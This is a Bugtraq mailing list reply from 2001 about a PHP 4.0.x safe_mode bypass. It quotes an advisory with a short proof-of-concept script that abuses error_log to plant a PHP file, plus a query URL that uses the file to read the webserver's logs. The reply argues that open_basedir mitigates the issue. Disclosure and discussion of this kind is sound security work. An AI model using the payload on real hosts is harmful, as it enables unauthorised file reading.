Bugtraq mailing list archives

Re: php breaks safe mode

From: Laurent Papier <papier () sdv fr>
Date: Mon, 02 Jul 2001 17:02:50 +0200

Joost Pol wrote:

2. PHP Version 4.0.5/4.0.4pl1 SOMETIMES breaks safe_mode.

 2.0 - Description of the problem

  PHP safe_mode has the nice feature of disallowing the opening/reading
  and writing to files that are not owned by the uid that the script
  is owned by.

  Though using some "common sense" it still is possible to open/read
  and write to files that are owned by the uid the webserver is
  running as.

  *notice* assuming that something like suexec is not in place */notice*

  An attacker could upload a simple script that does the following:

  <?
        $cmd = '<? showsource($foo); ?>';
        error_log($cmd,3,"/path/to/user/wwwspace/nobody.php");
  ?>

  For example, assuming that the error_log is owned by the webserver it
  could be read using a simple query:

  http://foo.bar/~user/nobody.php?foo=/path/to/webserver/logs/access_log

 2.1 - Impact

  Depends on the setup of the hosting box.

  If suexec or something similiar is used, impact is nihil.

  See also 1.1.1/1.1.2

 2.3 - Solution

  Disallow the changing of the error_log location in safe_mode?

  Not really for me to say, the PHP-team will come with something good.

  Notice: just changing the error_log function wont do, you could also
          change the ini setting error_log (or another ini setting
          that has a similiar effect).

          These ini settings can be set from a user script since they
          all have PHP_INI_ALL perimissions.

          Maybe disallow setting of ini variables in safemode?


I think safe_mode should always be used with open_basedir directive in
order to limit user filesystem access.
As error_log is limited by open_basedir, suexec is not needed to have a
secure system as long as open_basedir is correctly set.

I see nothing wrong allowing user to use error_log.
I don't think PHP-team should change the error-log function.

-- 
Laurent Papier - Admin. systeme
Sdv Plurimedia - <http://www.sdv.fr>

Current thread:

php breaks safe mode Joost Pol (Jul 01)
- Re: php breaks safe mode Laurent Papier (Jul 02)
  - Re: php breaks safe mode Joost Pol (Jul 02)
    - Re: php breaks safe mode Laurent Papier (Jul 03)
    - Re: php breaks safe mode Patrick Oonk (Jul 03)
- Re: [BUGTRAQ] php breaks safe mode Joe Harris (Jul 03)
  - Re: [BUGTRAQ] php breaks safe mode Joost Pol (Jul 03)
    - Re: [BUGTRAQ] php breaks safe mode Raptor (Jul 05)
    - Re: [BUGTRAQ] php breaks safe mode H D Moore (Jul 05)
    - Re: [BUGTRAQ] php breaks safe mode Steffen Dettmer (Jul 06)
    - Re: [BUGTRAQ] php breaks safe mode Steffen Dettmer (Jul 05)
    - Re: [BUGTRAQ] php breaks safe mode Sander Steffann (Jul 06)